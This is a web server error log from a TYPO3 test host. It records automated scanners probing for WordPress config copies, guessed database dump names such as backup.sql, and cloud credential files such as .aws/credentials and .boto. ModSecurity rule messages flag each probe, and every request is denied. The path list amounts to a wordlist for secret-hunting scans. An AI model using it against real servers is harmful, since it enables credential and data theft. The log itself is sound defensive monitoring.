[Fri Apr 05 03:01:47.062544 2024] [:error] [pid 2272633] [client 91.215.85.29:53354] [client 91.215.85.29] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.txt"] [unique_id "Zg9Ne_UzfkmOvnEGQl8iCAAAAAE"]
[Fri Apr 05 03:01:47.062946 2024] [:error] [pid 2272633] [client 91.215.85.29:53354] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.txt"] [unique_id "Zg9Ne_UzfkmOvnEGQl8iCAAAAAE"]
[Fri Apr 05 03:01:47.063154 2024] [:error] [pid 2272633] [client 91.215.85.29:53354] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.txt"] [unique_id "Zg9Ne_UzfkmOvnEGQl8iCAAAAAE"]
[Fri Apr 05 03:01:47.098776 2024] [:error] [pid 2273014] [client 91.215.85.29:53368] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/zb_users/c_option.php.backup"] [unique_id "Zg9Ne9qZi0hNKs0Q6mN6eQAAAAY"]
[Fri Apr 05 03:01:47.099138 2024] [:error] [pid 2273014] [client 91.215.85.29:53368] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/zb_users/c_option.php.backup"] [unique_id "Zg9Ne9qZi0hNKs0Q6mN6eQAAAAY"]
[Fri Apr 05 03:01:47.099299 2024] [:error] [pid 2273014] [client 91.215.85.29:53368] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/zb_users/c_option.php.backup"] [unique_id "Zg9Ne9qZi0hNKs0Q6mN6eQAAAAY"]
[Fri Apr 05 03:01:47.217080 2024] [:error] [pid 2272636] [client 91.215.85.29:53388] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/zb_users/c_option.php.old"] [unique_id "Zg9Ne-7eMoB0OR9e06ensgAAAAQ"]
[Fri Apr 05 03:01:47.217454 2024] [:error] [pid 2272636] [client 91.215.85.29:53388] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/zb_users/c_option.php.old"] [unique_id "Zg9Ne-7eMoB0OR9e06ensgAAAAQ"]
[Fri Apr 05 03:01:47.217621 2024] [:error] [pid 2272636] [client 91.215.85.29:53388] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/zb_users/c_option.php.old"] [unique_id "Zg9Ne-7eMoB0OR9e06ensgAAAAQ"]
[Thu Apr 18 23:07:31.964836 2024] [authz_core:error] [pid 2590286] [client 45.135.232.70:46092] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_backup.sql
[Thu Apr 18 23:07:31.982672 2024] [authz_core:error] [pid 2598275] [client 45.135.232.70:46096] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/mysqldump.sql
[Thu Apr 18 23:07:31.987464 2024] [authz_core:error] [pid 2590289] [client 45.135.232.70:46104] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/data.sql
[Thu Apr 18 23:07:31.994273 2024] [authz_core:error] [pid 2607488] [client 45.135.232.70:46126] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup2.sql
[Thu Apr 18 23:07:31.996455 2024] [authz_core:error] [pid 2590287] [client 45.135.232.70:46136] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dbdump.sql
[Thu Apr 18 23:07:31.997536 2024] [authz_core:error] [pid 2590288] [client 45.135.232.70:46110] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup1.sql
[Thu Apr 18 23:07:32.003285 2024] [authz_core:error] [pid 2607489] [client 45.135.232.70:46168] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Thu Apr 18 23:07:32.003617 2024] [authz_core:error] [pid 2594760] [client 45.135.232.70:46132] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_version2.sql
[Thu Apr 18 23:07:32.003894 2024] [authz_core:error] [pid 2607487] [client 45.135.232.70:46148] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/inventory.sql
[Thu Apr 18 23:07:32.009772 2024] [authz_core:error] [pid 2590285] [client 45.135.232.70:46160] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Thu Apr 18 23:07:32.066707 2024] [authz_core:error] [pid 2590286] [client 45.135.232.70:46128] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db2.sql
[Thu Apr 18 23:07:32.084751 2024] [authz_core:error] [pid 2598275] [client 45.135.232.70:46176] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/localhost.sql
[Thu Apr 18 23:07:32.085292 2024] [authz_core:error] [pid 2590289] [client 45.135.232.70:46182] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/archive.sql
[Thu Apr 18 23:07:32.093851 2024] [authz_core:error] [pid 2607488] [client 45.135.232.70:46192] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Thu Apr 18 23:07:32.098807 2024] [authz_core:error] [pid 2590288] [client 45.135.232.70:46208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/localhost2.sql
[Thu Apr 18 23:07:32.114113 2024] [authz_core:error] [pid 2607489] [client 45.135.232.70:46222] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/mysql.sql
[Thu Apr 18 23:07:32.131614 2024] [authz_core:error] [pid 2607487] [client 45.135.232.70:46240] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/production_backup.sql
[Thu Apr 18 23:07:32.134031 2024] [authz_core:error] [pid 2590287] [client 45.135.232.70:46238] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/orders.sql
[Thu Apr 18 23:07:32.145653 2024] [authz_core:error] [pid 2594760] [client 45.135.232.70:46242] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/production.sql
[Thu Apr 18 23:07:32.150069 2024] [authz_core:error] [pid 2590285] [client 45.135.232.70:46262] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.sql
[Thu Apr 18 23:07:32.168228 2024] [authz_core:error] [pid 2590286] [client 45.135.232.70:46282] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/sql.sql
[Thu Apr 18 23:07:32.186928 2024] [authz_core:error] [pid 2598275] [client 45.135.232.70:46272] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/site.sql
[Thu Apr 18 23:07:32.190781 2024] [authz_core:error] [pid 2607488] [client 45.135.232.70:46256] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secondary_database.sql
[Thu Apr 18 23:07:32.200093 2024] [authz_core:error] [pid 2590288] [client 45.135.232.70:46264] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/sql_backup.sql
[Thu Apr 18 23:07:32.213659 2024] [authz_core:error] [pid 2607489] [client 45.135.232.70:46294] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/staging_backup.sql
[Thu Apr 18 23:07:32.234907 2024] [authz_core:error] [pid 2590287] [client 45.135.232.70:46304] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/temp1.sql
[Thu Apr 18 23:07:32.236475 2024] [authz_core:error] [pid 2607487] [client 45.135.232.70:46298] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/staging.sql
[Thu Apr 18 23:07:32.252036 2024] [authz_core:error] [pid 2594760] [client 45.135.232.70:46308] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/temp2.sql
[Thu Apr 18 23:07:32.270096 2024] [authz_core:error] [pid 2590285] [client 45.135.232.70:46322] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/temp.sql
[Thu Apr 18 23:07:32.284259 2024] [authz_core:error] [pid 2598275] [client 45.135.232.70:46332] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.sql
[Thu Apr 18 23:07:32.284782 2024] [authz_core:error] [pid 2590286] [client 45.135.232.70:46326] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test_backup.sql
[Thu Apr 18 23:07:32.291009 2024] [authz_core:error] [pid 2607488] [client 45.135.232.70:46336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/translate.sql
[Thu Apr 18 23:07:32.316258 2024] [authz_core:error] [pid 2590288] [client 45.135.232.70:46352] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/users.sql
[Thu Apr 18 23:07:32.321393 2024] [authz_core:error] [pid 2607489] [client 45.135.232.70:46350] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user_data.sql
[Thu Apr 18 23:07:32.335082 2024] [authz_core:error] [pid 2607487] [client 45.135.232.70:46368] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Thu Apr 18 23:07:32.335214 2024] [authz_core:error] [pid 2590287] [client 45.135.232.70:46358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Thu Apr 18 23:07:32.354228 2024] [authz_core:error] [pid 2594760] [client 45.135.232.70:46360] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Thu Apr 18 23:07:32.367030 2024] [authz_core:error] [pid 2590285] [client 45.135.232.70:46374] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Thu Apr 18 23:07:32.382367 2024] [authz_core:error] [pid 2598275] [client 45.135.232.70:46442] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Thu Apr 18 23:07:32.386089 2024] [authz_core:error] [pid 2590286] [client 45.135.232.70:46426] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump_archive.sql
[Thu Apr 18 23:07:32.394127 2024] [authz_core:error] [pid 2607488] [client 45.135.232.70:46386] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.sql
[Thu Apr 18 23:07:32.413937 2024] [authz_core:error] [pid 2590288] [client 45.135.232.70:46416] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/localhost1.sql
[Thu Apr 18 23:07:32.428138 2024] [authz_core:error] [pid 2607489] [client 45.135.232.70:46388] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin.sql
[Thu Apr 18 23:07:32.443712 2024] [authz_core:error] [pid 2590287] [client 45.135.232.70:46382] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_version1.sql
[Thu Apr 18 23:07:32.443757 2024] [authz_core:error] [pid 2607487] [client 45.135.232.70:46458] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/main_database.sql
[Thu Apr 18 23:07:32.451806 2024] [authz_core:error] [pid 2594760] [client 45.135.232.70:46402] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/1.sql
[Thu Apr 18 23:07:32.465933 2024] [authz_core:error] [pid 2590285] [client 45.135.232.70:46424] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/client_data.sql
[Thu Apr 18 23:07:32.480827 2024] [authz_core:error] [pid 2598275] [client 45.135.232.70:46452] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.sql
[Wed Apr 24 02:46:53.369545 2024] [authz_core:error] [pid 2736044] [client 91.215.85.29:46378] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/awscli.ini
[Wed Apr 24 02:46:53.381401 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:46408] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:53.382886 2024] [authz_core:error] [pid 2736049] [client 91.215.85.29:46438] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:53.385205 2024] [authz_core:error] [pid 2735802] [client 91.215.85.29:46450] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:53.387521 2024] [authz_core:error] [pid 2736045] [client 91.215.85.29:46404] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Wed Apr 24 02:46:53.476335 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:46468] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Wed Apr 24 02:46:53.581709 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:46510] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:53.678877 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:46524] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-eks
[Wed Apr 24 02:46:53.831670 2024] [authz_core:error] [pid 2736042] [client 91.215.85.29:46534] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws_keys.ini
[Wed Apr 24 02:46:53.843841 2024] [authz_core:error] [pid 2735801] [client 91.215.85.29:46580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:53.851286 2024] [authz_core:error] [pid 2736044] [client 91.215.85.29:46594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-config.ini
[Wed Apr 24 02:46:53.938264 2024] [authz_core:error] [pid 2735801] [client 91.215.85.29:46632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-ruby-sdk-config.yml
[Wed Apr 24 02:46:54.048861 2024] [:error] [pid 2736042] [client 91.215.85.29:46898] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/aws/env.config"] [unique_id "ZihWfvHWUqDDg9bCRI8nwgAAAAM"]
[Wed Apr 24 02:46:54.049174 2024] [:error] [pid 2736042] [client 91.215.85.29:46898] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/aws/env.config"] [unique_id "ZihWfvHWUqDDg9bCRI8nwgAAAAM"]
[Wed Apr 24 02:46:54.049330 2024] [:error] [pid 2736042] [client 91.215.85.29:46898] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/aws/env.config"] [unique_id "ZihWfvHWUqDDg9bCRI8nwgAAAAM"]
[Wed Apr 24 02:46:54.136644 2024] [authz_core:error] [pid 2736045] [client 91.215.85.29:46836] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Wed Apr 24 02:46:54.143592 2024] [authz_core:error] [pid 2736042] [client 91.215.85.29:47052] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Wed Apr 24 02:46:54.168554 2024] [:error] [pid 2735802] [client 91.215.85.29:46716] [client 91.215.85.29] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "ZihWfu0Vyt9d3d8IWNwHWwAAAAk"]
[Wed Apr 24 02:46:54.168770 2024] [:error] [pid 2735802] [client 91.215.85.29:46716] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "ZihWfu0Vyt9d3d8IWNwHWwAAAAk"]
[Wed Apr 24 02:46:54.168933 2024] [:error] [pid 2735802] [client 91.215.85.29:46716] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "ZihWfu0Vyt9d3d8IWNwHWwAAAAk"]
[Wed Apr 24 02:46:54.229958 2024] [authz_core:error] [pid 2736045] [client 91.215.85.29:47036] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:54.237203 2024] [authz_core:error] [pid 2736042] [client 91.215.85.29:46958] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-config.yml
[Wed Apr 24 02:46:54.315745 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:46950] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Wed Apr 24 02:46:54.331374 2024] [authz_core:error] [pid 2736042] [client 91.215.85.29:46886] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:54.383614 2024] [:error] [pid 2735802] [client 91.215.85.29:46996] [client 91.215.85.29] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZihWfu0Vyt9d3d8IWNwHXQAAAAk"]
[Wed Apr 24 02:46:54.383838 2024] [:error] [pid 2735802] [client 91.215.85.29:46996] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZihWfu0Vyt9d3d8IWNwHXQAAAAk"]
[Wed Apr 24 02:46:54.383980 2024] [:error] [pid 2735802] [client 91.215.85.29:46996] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZihWfu0Vyt9d3d8IWNwHXQAAAAk"]
[Wed Apr 24 02:46:54.404429 2024] [authz_core:error] [pid 2737952] [client 91.215.85.29:46938] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws_keys.yml
[Wed Apr 24 02:46:54.411626 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:46784] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:54.488803 2024] [authz_core:error] [pid 2735800] [client 91.215.85.29:47132] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secrets.yml
[Wed Apr 24 02:46:54.510580 2024] [authz_core:error] [pid 2736046] [client 91.215.85.29:46970] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Wed Apr 24 02:46:54.584117 2024] [authz_core:error] [pid 2735800] [client 91.215.85.29:47182] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Wed Apr 24 02:46:54.619975 2024] [authz_core:error] [pid 2735869] [client 91.215.85.29:47238] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/beanstalk
[Wed Apr 24 02:46:54.657764 2024] [:error] [pid 2736042] [client 91.215.85.29:47250] [client 91.215.85.29] ModSecurity: Warning. Matched phrase ".boto" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .boto found within REQUEST_FILENAME: /.boto"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.boto"] [unique_id "ZihWfvHWUqDDg9bCRI8nyAAAAAM"]
[Wed Apr 24 02:46:54.657960 2024] [:error] [pid 2736042] [client 91.215.85.29:47250] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.boto"] [unique_id "ZihWfvHWUqDDg9bCRI8nyAAAAAM"]
[Wed Apr 24 02:46:54.658101 2024] [:error] [pid 2736042] [client 91.215.85.29:47250] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.boto"] [unique_id "ZihWfvHWUqDDg9bCRI8nyAAAAAM"]
[Wed Apr 24 02:46:54.680881 2024] [authz_core:error] [pid 2735800] [client 91.215.85.29:47248] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/bitbucket-pipelines.yml
